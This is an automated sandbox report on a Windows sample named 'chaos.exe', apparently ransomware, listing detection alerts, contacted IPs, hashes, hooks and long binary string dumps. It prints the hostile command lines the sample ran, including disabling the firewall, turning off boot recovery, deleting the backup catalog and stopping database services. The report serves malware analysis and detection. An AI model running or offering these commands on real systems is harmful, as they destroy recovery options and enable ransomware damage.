chaos.exe
This report is generated from a file or URL submitted to this webservice on April 12th 2020 20:56:18 (UTC)
Guest System: Windows 7 64 bit, Professional, 6.1 (build 7601), Service Pack 1
Report generated by Falcon Sandbox v8.30 © Hybrid Analysis
Incident Response
Risk Assessment
- Spyware: Found a string that may be used as part of an injection method; POSTs files to a webserver
- Persistence: Modifies firewall settings; Spawns a lot of processes; Tries to suppress failures during boot (often used to hide system changes)
- Evasive: Possibly tries to implement anti-virtualization techniques; The input sample contains a known anti-VM trick
- Network Behavior: Contacts 2 domains and 3 hosts
MITRE ATT&CK™ Techniques Detection
Indicators
Malicious Indicators (8)

Anti-Detection/Stealthyness
Tries to suppress failures during boot (often used to hide system changes)
- details: Tries to suppress failures during boot "cmd.exe" with commandline "%WINDIR%\system32\cmd.exe /c bcdedit /set {default} bootstatuspolicy ignoreallfailures"
- source: Monitored Target
- relevance: 8/10

Environment Awareness

The input sample contains a known anti-VM trick
- details: Found VM detection artifact "CPUID trick" in "0b032586772c4b52ca2712d92f5a13b26051ef72a8bcdd70c98eb9faffa22425.bin" (Offset: 417187)
- source: Binary File
- relevance: 5/10
- ATT&CK ID: T1497

External Systems

Detected Suricata Alert
- details:
Detected alert "ETPRO HUNTING Suspicious Terse HTTP Request to Pastebin" (SID: 2811838, Rev: 6, Severity: 1) categorized as "A Network Trojan was detected"
Detected alert "ET USER_AGENTS SFML User-Agent (libsfml-network) " (SID: 2026914, Rev: 1, Severity: 1) categorized as "A Network Trojan was detected"
Detected alert "ETPRO MALWARE Zeropadypt/Limbo/Ouroboros Ransomware CnC Checkin M4" (SID: 2839873, Rev: 2, Severity: 1) categorized as "Malware Command and Control Activity Detected" (PUA/PUP/Adware)
- source: Suricata Alerts
- relevance: 10/10

Network Related

Malicious artifacts seen in the context of a contacted host
- details:
Found malicious artifacts related to "148.251.247.174": ...
URL: https://www.sfml-dev.org/documentation/2.3.1/classsf_1_1Keyboard.php (AV positives: 2/77 scanned on 04/08/2020 20:55:26)
URL: http://www.sfml-dev.org/ (AV positives: 2/77 scanned on 04/08/2020 09:06:28)
URL: http://sfml-dev.org/ (AV positives: 1/77 scanned on 04/08/2020 09:01:59)
URL: https://www.sfml-dev.org/files/SFML-2.5.1-macOS-clang.tar.gz (AV positives: 1/71 scanned on 03/16/2020 09:16:09)
URL: https://www.sfml-dev.org/learn.php (AV positives: 2/71 scanned on 03/11/2020 21:00:20)
File SHA256: 26690dae115f47a1e0167750209a30cc68f51c5090e3b908105c93967e5156fa (Date: 04/11/2020 22:57:50)
File SHA256: c4018b6e9dd769a8f0da65d09d5f955438e6c5ad7e40e4bc408ca2e60e4c4564 (Date: 04/10/2020 08:41:51)
File SHA256: e1fd9542da139a0071b425c11ef0ed094a996e6bc8366362f3d5fe7e200c879d (Date: 04/09/2020 02:10:50)
File SHA256: 751281b30f77a60252ff7547863ffa14d028ebce141c2b50a8d979feeee35a7e (Date: 04/05/2020 20:33:51)
File SHA256: 01a6be0b7133c34bb31c33dbcf6e742c1866461e9229a2dc1e87d4f6eec5b2e1 (Date: 04/02/2020 18:24:56)
File SHA256: 8ba04f6fde6a7b42527d69742c49da2ac529354f71f553409f9f821d618de4b6 (AV positives: 1/61 scanned on 09/12/2018 11:03:57)
File SHA256: 94c7beb5903d412cdb1ea2ee424c293f051e47d4df9cb511869e533c95ac7644 (AV positives: 1/62 scanned on 07/31/2018 04:20:07)
File SHA256: ad50ded8aa8938373f853a4f3f43d3f4f496bb185df95cda86b10cb7851840b6 (AV positives: 14/62 scanned on 06/04/2018 20:13:28)
File SHA256: d12ba466eb20de3b34dddf73741e80f4d37b6aa0de05d1aa713dd27dbc80c46b (AV positives: 1/61 scanned on 02/13/2018 12:52:38)
File SHA256: c341c3d42655ffb4d1fbff153999ba17262786bd13b404a038f0bfe1f8ec85d9 (AV positives: 1/61 scanned on 01/29/2018 06:59:38)
Found malicious artifacts related to "104.23.98.190": ...
URL: https://pastebin.com/raw/ieQmRJtg (AV positives: 2/77 scanned on 04/12/2020 21:02:27)
URL: https://pastebin.com/raw/0hNR8dnd (AV positives: 6/77 scanned on 04/12/2020 21:01:25)
URL: https://pastebin.com/raw/Ww2WR8um (AV positives: 2/77 scanned on 04/12/2020 21:00:17)
URL: http://pastebin.com/raw.php?i=2Atf7qcq (AV positives: 1/77 scanned on 04/12/2020 20:30:41)
URL: https://pastebin.com/raw/Upc4PVcR (AV positives: 1/77 scanned on 04/12/2020 20:27:30)
File SHA256: 3eaf40d4ef074890c407b9f987a818ac3fd0c064784bac2474c9f0d144a1328b (Date: 04/12/2020 19:35:47)
File SHA256: 1e4777f9a083ea7cf31e7c5a8f4530e1459d5693b9265dd33e5ed17465c77334 (Date: 04/12/2020 19:26:54)
File SHA256: 0e8499e14c420d827d17908d65eadbf3da21b199a4c94c5b65d52b2fd961afd3 (Date: 04/12/2020 19:12:54)
File SHA256: 17eae82e6916ed9062ece69e59e7e3cc6d03434acae10c74e1feb67342b959e5 (Date: 04/12/2020 19:07:29)
File SHA256: fb82624e7971545dcc430b7ea079a5efc2fdfdb963c35c78c5be38f3ce3daaae (Date: 04/12/2020 19:01:04)
File SHA256: 4c803202c947798bb50c47adb6d9bb473a77093ba9a1a61403803bab74d1ea99 (AV positives: 18/75 scanned on 04/10/2020 16:25:03)
File SHA256: 5aa119e439a9c62cd5334df2a0c24fa853733ff78668616f3c34e3ebad4ab541 (AV positives: 6/75 scanned on 04/10/2020 07:34:34)
File SHA256: 63f455cbdea895e7e4118372ce27bb78f147aaf46d6dd1e53c4497f0825922ec (AV positives: 16/74 scanned on 04/10/2020 11:35:02)
File SHA256: baa5896703fb97e96e88922f0f67d2eb57056436781f8d127b5f890e314818c2 (AV positives: 5/75 scanned on 04/09/2020 16:14:14)
File SHA256: ac4ccdad94cd207f054c8134325736e07a314eea570357315f60e34a058691bd (AV positives: 31/74 scanned on 04/09/2020 06:30:23)
- source: Network Traffic
- relevance: 10/10

Multiple malicious artifacts seen in the context of different hosts
- details: the same URL and file artifacts for "148.251.247.174" and "104.23.98.190" as listed under "Malicious artifacts seen in the context of a contacted host" above
- source: Network Traffic
- relevance: 10/10

Uses network protocols on unusual ports
- details: TCP traffic to 80.82.69.109 on port 8080
- source: Network Traffic
- relevance: 7/10
- ATT&CK ID: T1065

System Security

Modifies firewall settings
- details:
Process "netsh.exe" with commandline "netsh advfirewall set currentprofile state off"
Process "netsh.exe" with commandline "netsh firewall set opmode mode=disable"
- source: Monitored Target
- relevance: 8/10
- ATT&CK ID: T1089

Unusual Characteristics

Spawns a lot of processes
- details:
Spawned process "chaos.exe"
Spawned process "cmd.exe" with commandline "%WINDIR%\system32\cmd.exe /c net stop SQLWriter"
Spawned process "net.exe" with commandline "net stop SQLWriter"
Spawned process "net1.exe" with commandline "%WINDIR%\system32\net1 stop SQLWriter"
Spawned process "cmd.exe" with commandline "%WINDIR%\system32\cmd.exe /c net stop SQLBrowser"
Spawned process "net.exe" with commandline "net stop SQLBrowser"
Spawned process "net1.exe" with commandline "%WINDIR%\system32\net1 stop SQLBrowser"
Spawned process "cmd.exe" with commandline "%WINDIR%\system32\cmd.exe /c net stop MSSQLSERVER"
Spawned process "net.exe" with commandline "net stop MSSQLSERVER"
Spawned process "net1.exe" with commandline "%WINDIR%\system32\net1 stop MSSQLSERVER"
Spawned process "cmd.exe" with commandline "%WINDIR%\system32\cmd.exe /c net stop MSSQL$CONTOSO1"
Spawned process "net.exe" with commandline "net stop MSSQL$CONTOSO1"
Spawned process "net1.exe" with commandline "%WINDIR%\system32\net1 stop MSSQL$CONTOSO1"
Spawned process "cmd.exe" with commandline "%WINDIR%\system32\cmd.exe /c net stop MSDTC"
Spawned process "net.exe" with commandline "net stop MSDTC"
Spawned process "net1.exe" with commandline "%WINDIR%\system32\net1 stop MSDTC"
Spawned process "cmd.exe" with commandline "%WINDIR%\system32\cmd.exe /c bcdedit /set {default} bootstatuspolicy ignoreallfailures"
Spawned process "cmd.exe" with commandline "%WINDIR%\system32\cmd.exe /c bcdedit /set {default} recoveryenabled no"
Spawned process "cmd.exe" with commandline "%WINDIR%\system32\cmd.exe /c wbadmin delete catalog -quiet"
Spawned process "cmd.exe" with commandline "%WINDIR%\system32\cmd.exe /c net stop SQLSERVERAGENT"
Spawned process "net.exe" with commandline "net stop SQLSERVERAGENT"
Spawned process "net1.exe" with commandline "%WINDIR%\system32\net1 stop SQLSERVERAGENT"
Spawned process "cmd.exe" with commandline "%WINDIR%\system32\cmd.exe /c net stop MSSQLSERVER"
Spawned process "net.exe" with commandline "net stop MSSQLSERVER"
Spawned process "net1.exe" with commandline "%WINDIR%\system32\net1 stop MSSQLSERVER"
Spawned process "cmd.exe" with commandline "%WINDIR%\system32\cmd.exe /c net stop vds"
Spawned process "net.exe" with commandline "net stop vds"
Spawned process "net1.exe" with commandline "%WINDIR%\system32\net1 stop vds"
Spawned process "cmd.exe" with commandline "%WINDIR%\system32\cmd.exe /c netsh advfirewall set currentprofile state off"
Spawned process "netsh.exe" with commandline "netsh advfirewall set currentprofile state off"
Spawned process "cmd.exe" with commandline "%WINDIR%\system32\cmd.exe /c netsh firewall set opmode mode=disable"
Spawned process "netsh.exe" with commandline "netsh firewall set opmode mode=disable"
- source: Monitored Target
- relevance: 8/10

Suspicious Indicators (14)

Environment Awareness

Possibly tries to implement anti-virtualization techniques
- details:
- ";r;s99t3Qua3@uES^`F`yj$_F\d|9~duFd9uFdu9uFdd9uFdS9uFdB9uFd19uFd 9uFd9uFdvdjY~dqaY^`[3_^]UQQEMUS]VuW3;tuE Ej"Xf9u3j"Xtffftuf;Etf;Eut3fB}3]f9f;Etf;Euf9tuEuj\EXCf9tj"Xf9j\Xu;u%tj"_f9y}u" (Indicator: "qemu")
- source: File/Memory
- relevance: 4/10
- ATT&CK ID: T1497

External Systems

Detected Suricata Alert
- details:
Detected alert "ETPRO POLICY External IP Address Lookup via libsfml-network" (SID: 2838021, Rev: 1, Severity: 2) categorized as "Device Retrieving External IP Address Detected"
Detected alert "ETPRO INFO HTTP Request with Lowercase connection Header Observed" (SID: 2838131, Rev: 1, Severity: 2) categorized as "Potentially Bad Traffic"
- source: Suricata Alerts
- relevance: 10/10

Found an IP/URL artifact that was identified as malicious by at least one reputation engine
- details:
1/77 reputation engines marked "http://sfml-dev.org" as malicious (1% detection rate)
1/77 reputation engines marked "http://pastebin.com" as malicious (1% detection rate)
2/77 reputation engines marked "http://www.sfml-dev.org" as malicious (2% detection rate)
- source: External System
- relevance: 10/10

General

POSTs files to a webserver
- details:
"POST /1614CEEEC50A9336EBF690886CAA747D6811C45D37086A3FA7B11C9E83926C6C HTTP/1.1
connection: close
content-length: 1720
content-type: application/x-www-form-urlencoded
from: me
host: 80.82.69.109
user-agent: libsfml-network/2.x" with no payload
- source: Network Traffic
- relevance: 5/10

Installation/Persistence

Found a string that may be used as part of an injection method
- details:
";D/;DW;D|;D;D;D;D;D<DF<Da<D<D<D<DU{D8jDjD7D)@@@7DD8D.sDz7DX7D3D(DD=D4=D<DDDDtotal progress passed: progress over limitGlobal\ARM Update MutexARM update mutex createdNo file objects in SessionCould not find and validate file: File to be added to install object: FileList in Single Install: Unknown file type in file objectNo Installs initializedUnknown install type in ExecuteInstalls() - will skipInstall_Exit_CodeInstallation returned ERROR_SUCCESSInstallation returned ERROR_SUCCESS_REBOOT_REQUIREDReboot_RequiredInstallation returned error code: Last MSI action name: Last_Msi_Action_NameInstallProductExe... file - args - GetExitCodeProcess failed with exit code: InstallProduct7...IDS_ACTION_EXTRACTINGWebMsiPath/ARMExitCodeSOFTWARE\Adobe\Setup\ReaderErrorTextError text not registeredLogTimeExit code not registered or does not matchExtract installer failedRegistered extracted web installer path in HKLM: Registered extracted web installer path in HKCU: Failed to read registered extracted web installer pathsetupexeValidate file failed: entered msi type installationDISABLE_CACHE DISABLE_CACHE="1"wait for DummyProgressProc thread to exit failedInstallProductMsi...InstallProductMsp...InstallProductEsd...Will launch valid: Invalid empty argumentsInvalid empty ESD argumentsInvalid empty Setup.exe argumentsInvalid argumentsSHGetFolderPath failed\Adobe\Setup\The r_s function failed!/d /d "_x64setup.exeProductCodefailed to get ProductCode from failed to open database: file not valid: failed to lock file: failed to process Extract Dir: will not move
directory already exists: MoveFile failed: ExecuteRetryInstall....exeNot supported file typeJA\JAAdobe Systems
IncorporatedValidate failed - CN1.3.6.1.4.1.311.2.1.121.2.840.113549.1.9.61.3.6.1.4.1.311.3.3.1Cert validation failed - ID: Hash algorithm validation failed: Hash encryption algorithm validation failed: 1.2.840.1135491.2.840.113549.11.2.840.113549.21.2.840.113549.31.2.840.113549.1.11.2.840.113549.1.21.2.840.113549.1.31.2.840.113549.1.41.2.840.113549.1.51.2.840.113549.1.61.2.840.113549.1.71.2.840.113549.1.81.2.840.113549.1.91.2.840.113549.1.101.2.840.113549.1.121.2.840.113549.1.1.11.2.840.113549.1.1.21.2.840.113549.1.1.31.2.840.113549.1.1.41.2.840.113549.1.1.51.2.840.113549.1.1.61.2.840.113549.1.1.71.2.840.113549.1.1.81.2.840.113549.1.1.91.2.840.113549.1.1.101.2.840.113549.1.1.111.2.840.113549.1.1.121.2.840.113549.1.1.131.2.840.113549.1.3.11.2.840.113549.1.7.11.2.840.113549.1.7.21.2.840.113549.1.7.31.2.840.113549.1.7.41.2.840.113549.1.7.51.2.840.113549.1.7.61.2.840.113549.1.9.11.2.840.113549.1.9.21.2.840.113549.1.9.31.2.840.113549.1.9.41.2.840.113549.1.9.51.2.840.113549.1.9.71.2.840.113549.1.9.81.2.840.113549.1.9.91.2.840.113549.1.9.141.2.840.113549.1.9.151.2.840.113549.1.9.15.11.2.840.113549.1.9.16.31.2.840.113549.1.9.16.3.51.2.840.113549.1.9.16.3.61.2.840.113549.1.9.16.3.71.2.840.113549.2.21.2.840.113549.2.41.2.840.113549.2.51.2.840.113549.3.21.2.840.113549.3.41.2.840.113549.3.71.2.840.113549.3.91.2.840.100461.2.840.10046.2.11.2.840.100401.2.840.10040.4.11.2.840.10040.4.31.2.840.10045.2.11.2.840.10045.3.1.71.3.132.0.341.3.132.0.351.2.840.10045.4.11.2.840.10045.4.31.2.840.10045.4.3.21.2.840.10045.4.3.31.2.840.10045.4.3.42.16.840.1.101.3.4.1.22.16.840.1.101.3.4.1.422.16.840.1.101.3.4.1.52.16.840.1.101.3.4.1.252.16.840.1.101.3.4.1.451.3.133.16.840.63.0.21.3.132.1.11.11.3.132.1.11.21.3.14.3.2.131.3.14.3.2.151.3.14.3.2.181.3.14.3.2.211.3.14.3.2.231.3.14.3.2.241.3.14.3.2.251.3.14.3.2.261.3.14.3.2.271.3.14.3.2.281.3.14.3.2.291.3.14.7.2.21.3.14.7.2.3.12.16.840.1.101.3.4.2.12.16.840.1.101.3.4.2.22.16.840.1.101.3.4.2.32.5.8.2InitUpdateData...MsiOpenDatabase(): Manifest file 
not validFailed to lock Manifest file: InitUpdateFromProductUpdatesTable...SELECT * FROM `ProductUpdates` WHERE `ProductCode`='' AND `ProductVersion`=''MDOVMVEMVFInitUpdateFromProductUpdatesExTable...SELECT * FROM `ProductUpdatesEx` WHERE `ProductCode`='InitUpdateDataFromRecord...File list in Manifest: ProcessArmUpdateManifest...EnforceFailureOfArmUpdateEnforceFailureOfArmUpdate is setFailed to lock Manifest file.ProcessOnDemandManifest...SELECT * FROM `OnDemand` WHERE `OnDemandID`='Empty FileSequences dataEmpty product nameAdobe ApplicationSkipArmOnDemandUACSkipArmOnDemandUAC set in ManifestUrlFallbackUrlFallback: MODB: Manifest file not valid Failed to lock Manifest file InitArmUpdate...SELECT * FROM `ArmUpdate`DisableArmUpdateARM update record foundMGRS(File Name)MGRS(Arm Version)MGRS(Type)MGRS(URL)MGRS(Args)Error in ARM Update dataAdding ARM update object: ARM version - type - url - BlacklistARM Update Blacklist: Newer version ARM update is not availableInitUpdateFiles...SELECT `UpdateID`
`Type`
`URL`
`Size`
`Args`
`AllowNotElevatedInstall` FROM `UpdateFiles` WHERE `File`=''MGRS(UpdateID)Empty UpdateIDEmpty TypeEmpty URLMRGI(Size)New file object: get update values for Update ID: SELECT * FROM `Update` WHERE `UpdateID`='MGRS(MoreInfoURL)InitExtraManifestProperties...NoLongerSupportedNoLongerSupported is set in ManifestReportReport: AllowedLogsessionDllVersionsAllowedLogsessionDllVersions: InitManifestProperties...WaitMsiMutexLimitWaitMsiMutexLimit not set in ManifestWaitMsiMutexLimit: InstallTimeMaxInstallTimeMax: PreventAppLaunchMaxPreventAppLaunchMax: ErrorDetailsURLErrorDetailsURL: WhatsNewURLWhatsNewURL: UpgradeNameUpgradeName: UpgradeDisplayNameAdobe Acrobat Reader DCUpgradeDisplayName not found in Manifest, will use UpgradeDisplayName: WaitDynamicFilesInUseWaitDynamicFilesInUse: AllowCancelBITsJobsAllowCancelBITsJobs: AllowUpdateInSystemContextAllowUpdateInSystemContext: CloseApplicationsCloseApplications: AllowServiceConditionsFound AllowServiceConditions: AllowServiceModeAllowServiceMode: Service allowed in all modesService allowed in full auto mode onlyService not allowed - unknown AllowServiceMode value or not full auto mode for property valueBlacklist: BlacklistExceptionsBlacklistExceptions: InitFilesInUse...SELECT * FROM `AppsInUseEx`MGRS(Condition)MGRS(ModuleName)MGRS(ModulePath)WaitFilesInUseinfo: WaitFilesInUse is not set in ManifestInitUpgrade...Upgrade disabled, returning: Upgrade data not available: Upgrade IDSELECT * FROM `UpgradeEx` WHERE `Upgrade`=': URL: Upgrade MatchUpgradeName from product manifest: InitUpgradeData...PingVersionsPingVersions: DisableUpgradeDataUpgrade pings disabled by manifestDisableUpgradeManifestDownloadedPingupgrademanifestdownloadedupgrademanifestdownloaded ping disabled by manifestupgradedisabledUpgradeCheckIntervalNo upgrade in ManifestMsiOpenDatabaseUpgrade Manifest validation failedFailed to lock Upgrade ManifestCheckUpgradeConditions...UpgradeConditionsOneMustBeMetFound UpgradeConditionsOneMustBeMet: 
MinOSMinMemoryMinSPMaxOSUpgradeConditionsAllMustBeMetFound UpgradeConditionsAllMustBeMet: InitAutoUpgradeStatus...AutoUpgradeEmpty or null AutoUpgrade propertyFound AutoUpgrade property: AutoUpgradeDaysNLSDisableAutoUpgradeConditionsFound DisableAutoUpgradeConditions property: autoupgradedisabledSELECT `FileSequences` FROM `ProductUpgrades` WHERE `UpgradeMatch`='EvaluateUpdateForInstall...: SELECT * FROM `UpdateConditions` WHERE `UpdateID`='SkipInstallEvaluateCondition...: SELECT * FROM `Conditions` WHERE `Condition`='MGRS(sKey)Empty KeyPATCH_GUIDARM_ELEVATEDUSER_ADMINCondition metTRANSFORMEDMGRS(sName)FILEREG_STRREG_DWORDOSMSI_PRODUCTDATEPLUGINS_COUNTNot supported condition type in ManifestProcessOSCondition...ProcessRegCondition...Invalid Key valueNot supported registry rootvalue does not existProcessFileCondition...File: File foundFile not foundMsiGetFileVersion failedFile version: metnot metCondition IsPatchInstalled...: Patch installedERROR_BAD_CONFIGURATION in MsiEnumPatchesERROR_INVALID_PARAMETER in MsiEnumPatchesUnexpected error in MsiEnumPatchesProcessMsiProductCondition...NAVersionStringCould not get INSTALLPROPERTY_VERSIONSTRING for Product: ProcessDateCondition...Condition not met - invalid Min Date: Condition not met - invalid Max Date: ProcessPluginsCountCondition....apiTransformsJBHKEY_USERSHKEY_LOCAL_MACHINEHKEY_CURRENT_USERHKEY_CLASSES_ROOTZBbBtBuDkIExitMaximize&Click to activateShell_NotifyIcon failedShell_TrayWndTrayNotifyWnd" (Taskbar window class may be used to inject into explorer with the SetWindowLong method)
- source: File/Memory
- relevance: 4/10
- ATT&CK ID: T1055

Network Related

Found potential IP address in binary/memory
- details:
"255.255.255.255"
"80.82.69.52"
"148.251.247.174"
"104.23.98.190"
"80.82.69.109"
- source: File/Memory
- relevance: 3/10

Sends traffic on typical HTTP outbound port, but without HTTP header
- details:
TCP traffic to 148.251.247.174 on port 80 is sent without HTTP header
TCP traffic to 104.23.98.190 on port 80 is sent without HTTP header
TCP traffic to 80.82.69.109 on port 8080 is sent without HTTP header
- source: Network Traffic
- relevance: 5/10
- ATT&CK ID: T1043

Ransomware/Banking

The input sample dropped very many files
- details: The input sample dropped 1069 files (often an indicator for ransomware)
- source: Binary File
- relevance: 5/10

System Security

Stops a system service using net.exe
- details:
Process "net.exe" with commandline "net stop SQLWriter"
Process "net.exe" with commandline "net stop SQLBrowser" (Service: "Computer Browser", UID: 00010714-00003564)
Process "net.exe" with commandline "net stop MSSQLSERVER"
Process "net.exe" with commandline "net stop MSSQL$CONTOSO1"
Process "net.exe" with commandline "net stop MSDTC" (Service: "Distributed Transaction Coordinator", UID: 00010787-00003156)
Process "net.exe" with commandline "net stop SQLSERVERAGENT"
Process "net.exe" with commandline "net stop MSSQLSERVER"
Process "net.exe" with commandline "net stop vds" (Service: "Virtual Disk", UID: 00010912-00003984)
- source: Monitored Target
- relevance: 10/10

Unusual Characteristics

Imports suspicious APIs
- details:
GetDriveTypeA
FindFirstFileW
UnhandledExceptionFilter
WriteFile
GetModuleFileNameW
IsDebuggerPresent
GetModuleFileNameA
LoadLibraryExW
CreateThread
ExitThread
TerminateProcess
GetModuleHandleExW
CreateToolhelp32Snapshot
Process32First
LoadLibraryW
GetVersionExW
GetTickCount
VirtualProtect
Process32Next
OpenProcess
GetStartupInfoW
CreateDirectoryW
DeleteFileW
FindFirstFileExA
FindNextFileW
FindNextFileA
FindFirstFileExW
GetProcAddress
CreateFileW
GetCommandLineW
GetCommandLineA
GetModuleHandleA
GetModuleHandleW
GetFileAttributesExW
CreateProcessA
Sleep
VirtualAlloc
socket
recv
send
WSAStartup
connect
closesocket
- source: Static Parser
- relevance: 1/10

Installs hooks/patches the running process
- details:
"chaos.exe" wrote bytes "711128017a3b2701ab8b02007f950200fc8c0200729602006cc805001ecd24017d262401" to virtual address "0x761F07E4" (part of module "USER32.DLL")
"chaos.exe" wrote bytes "c0df41771cf94077ccf840770d64427700000000c011277500000000fc3e277500000000e0132775000000009457427625e04177c6e0417700000000bc6a417600000000cf3127750000000093194276000000002c32277500000000" to virtual address "0x76F81000" (part of module "NSI.DLL")
"chaos.exe" wrote bytes "0efc447781ed4377ae864277c6e04177effd44772d164377c0fc4077da8f4b7760144577478d4277a8e241776089427700000000ad37b7768b2db776b641b77600000000" to virtual address "0x721D1000" (part of module "WSHIP6.DLL")
"chaos.exe" wrote bytes "7d07457781ed4377ae864277c6e04177effd44772d16437760144577478d4277a8e241776089427700000000ad37b7768b2db776b641b77600000000" to virtual address "0x721C1000" (part of module "WSHTCPIP.DLL")
"cmd.exe" wrote bytes "711128017a3b2701ab8b02007f950200fc8c0200729602006cc805001ecd24017d262401" to virtual address "0x761F07E4" (part of module "USER32.DLL")
"net.exe" wrote bytes "c0df41771cf94077ccf840770d64427700000000c011277500000000fc3e277500000000e0132775000000009457427625e04177c6e0417700000000bc6a417600000000cf3127750000000093194276000000002c32277500000000" to virtual address "0x76F81000" (part of module "NSI.DLL")
"net1.exe" wrote bytes "c0df41771cf94077ccf840770d64427700000000c011277500000000fc3e277500000000e0132775000000009457427625e04177c6e0417700000000bc6a417600000000cf3127750000000093194276000000002c32277500000000" to virtual address "0x76F81000" (part of module "NSI.DLL")
- source: Hook Detection
- relevance: 10/10
- ATT&CK ID: T1179

Hiding 3 Suspicious Indicators

Informative (19)

Environment Awareness

Reads the active computer name
- details:
"net1.exe" (Path: "HKLM\SYSTEM\CONTROLSET001\CONTROL\COMPUTERNAME\ACTIVECOMPUTERNAME"; Key: "COMPUTERNAME")
"netsh.exe" (Path: "HKLM\SYSTEM\CONTROLSET001\CONTROL\COMPUTERNAME\ACTIVECOMPUTERNAME"; Key: "COMPUTERNAME")
- source: Registry Access
- relevance: 5/10
- ATT&CK ID: T1012

Reads the cryptographic machine GUID
- details: "netsh.exe" (Path: "HKLM\SOFTWARE\MICROSOFT\CRYPTOGRAPHY"; Key: "MACHINEGUID")
- source: Registry Access
- relevance: 10/10
- ATT&CK ID: T1012

General

Contacts domains
- details:
"pastebin.com"
"www.sfml-dev.org"
- source: Network Traffic
- relevance: 1/10

Contacts server
- details:
"148.251.247.174:80"
"104.23.98.190:80"
"80.82.69.109:8080"
- source: Network Traffic
- relevance: 1/10

Contains PDB pathways
- details:
"D:\yo\chaos\Release\chaos.pdb"
"JkBJBJ<B/SvcWideCharToMultiByte failed for: IsEULA_Accepted...iDisableCheckEULAIsEULA_Accepted Check disabled, returning 1\AdobeViewerEULA not yet acceptedEULAAcceptedForBrowserEULA accepted from 1EULA accepted from 2%s_Classes\VirtualStore\MACHINE\EULA accepted from 3IsVistaOrLater returns 1IsVistaOrLater returns 0IsXP returns 1kernel32.dllntdllRtlGetVersionRtlGetVersion failed, using GetVersionExProgramW6432PROCESSOR_ARCHITECTUREAMD64%d%d%c%dCheckSystemRequirements os,sp = %d %d osString = %s, physicalMemory (%d) = %dCheckSystemRequirements failed. Required MinOS: CheckSystemRequirements failed. Required MaxOS: CheckSystemRequirements failed. Required MinServicePack: CheckSystemRequirements failed. Required MinMemory: EnableLUAUAC is enabledUAC is disabled or not registeredSystem context install not allowed, will not update Std user with UAC offStdUserUacOffupgradeexitstduseruacoffMustElevate...already elevatedrequired to elevatenot required to elevate\Adobe\ARM\1.0\AdobeARM.exeSHGetFolderPath in GetCurrentExePath failed: \Adobe\ARM\1.0\SHGetFolderPath in GetLauncherPath failed: Not found or not valid: GetFileVersion(): File version: %1!u!.%2!u!.%3!u!.%4!u!VerQueryValue() failed in GetFileVersion().GetFileVersionInfo() failed in GetFileVersion().GetFileVersionInfoSize() failed in GetFileVersion().%1!u!.%2!u!.%3!u!.%4!u!IsNewArmAvailable...AdobeARM.exe version is not validIsNewArmAvailable: Major version is newer, returning 1.IsNewArmAvailable: Minor version is newer, returning 1.IsNewArmAvailable: Build number is newer, returning 1.IsNewArmAvailable: Revision number is newer, returning 1.IsNewArmAvailable: ARM version is up to date, returning 0.FindCurrentPDFOwner....pdf.pdf - no value.pdf value: AcroExch.DocumentAcroExch.Document.7\shellAcroExch.Document.7\shell - no valueReadAcroExch.Document.7\shell\Read\commandOpenAcroExch.Document.7\shell\Open\commandAcrobat.Document.\shell\Open\commandAcroExch.Document.\shell\Read\commandUnknown ProgID value in .pdfUnable 
to get file path "%1"File not found: AcroRd32.exeAcrobat.exeIsPatchingDisabled...Software\Policies\Microsoft\Windows\InstallerDisablePatchDisablePatch is set in HKLM\DisableLUAPatchingDisableLUAPatching is set in HKLM\GetPreferences...SOFTWARE\Policies\Adobe\Acrobat Reader\Adobe Acrobat\\FeatureLockdown.0\FeatureLockdownFeatureLockDown set to disable Updater.Using CommandLine preference AUTO_DOWNLOADAUTO_ALLAUTO_CHECK_UPDATESUsing registered preference AUTO_OFFpreferences not provided with command line and not registered - using default AUTO_DOWNLOADRegisterResult...Empty applicationtLastError_iInstallTime_tLastT_IsTimeElapsed...iDisableLastIsTimeElapsed Check disabled, returning 1Minutes elapsed: IsLongTimeNoUpdates...iIntervalLongTimeNoUpdates check is disabled, returning 0Unable to get base check in IsLongTimeNoUpdates, returning 0Days elapsed: Current time is less than registered timeLast check for updates is not positive: Last check for updates is registered but emptyLast check for updates decryption failedLast check for updates is not registeredRegisterError...IsErrorExpired...iDisableErrorCheckError check disabledRegistered Error data invalidRegistered Error Version invalidRegistered Error data irrelevant - Product Version has changedRegistered Error expiredRegistered Error not expiredRegistered Error time not validLast error is not registeredCanDelayUpdate...update release date cannot be usedupdate release time is newer than current timeno delay limit set, can delaydelay limit not reached, can delaydelay limit reachedRegisterPromptForUpgrade...iLastPromptForUpgradeiPromptForUpgradeIntervaltPromptedUpgradeNameiForcedUpgradeUserNotifiedIsPromptForUpgradeTimeElapsed...iDisablePromptForUpgradeCheck for Upgrade was found disabledUpgrade check forced, skipping last prompt validationiInstallTime_ReaderNew Upgrade is available, will prompt User: iDoNotRemindSkippedIsElapsed...Registered time expiredRegistered time not expiredRegistered time not valid not 
registeredGetDaysRemaning...Days remaining: iTestDaysRemainingFound and will use Days Remaining registered: iNotifyCountUpdate_Ready_Notify_CountiNotifyRebootCountReboot_Pending_Notify_CountRegisterWaitForFilesInUse: empty applicationTotal wait for the files in use: tTimeWaitedFilesInUse_GetTimeWaitedForFilesInUse: empty applicationvalue is registered but not valid: value is not registered ms available, waited Network isNetwork is notWaitForMsiMutex...WaitMsiMutex is over the limitexiting WaitMsiMutex on Application requestOpenSCManager failed in IsMsiBusy: MSIServerOpenService failed in IsMsiBusy: QueryServiceStatusEx failed in IsMsiBusy: Global\_MSIExecuteRepairInstalledArm...SYSTEM\CurrentControlSet\Control\Session ManagerPendingFileRenameOperationswill not repair, found pending rebootfound installed: successfully reinstalled: failed to reinstall: Service_Not_Allowed_ReasonNot Admin and SYSTEM context update is not allowed - will not use ServiceUAC is off and SYSTEM context update is not allowed - will not use ServiceLast Service failure not expired - Service is not allowediLoggedSvcErrorCodeService_Access_ErrorService error reported: Will not report already reported Service errorNotify service to create ShMOpenSCManager failedAdobeARMserviceOpenService failedQueryServiceStatusEx failedService is stopped or about to stopWaiting for Service to runQueryServiceStatusEx failed Service wait timed outService notify successService Manager reported error: Service success, time elapsed: Service error :*?Global\PdfOnershipInProcessEventpdf ownership takeover in process, will not cleanup ArmUI.ini fileCleanupEx...elevated, will not cleanupValidateSingleInstallFiles...Signature Validation failed for: ValidateSingleInstallFiles returns 0 file size for: ValidateSingleInstallFiles returns TRUE for: SELECT Value FROM Property WHERE Property.Property='%s'MsiViewExecute()MsiGetRecordString()GetCurrentUserSID(): LookupAccountName() failed @1st time call.GetCurrentUserSID():failed 
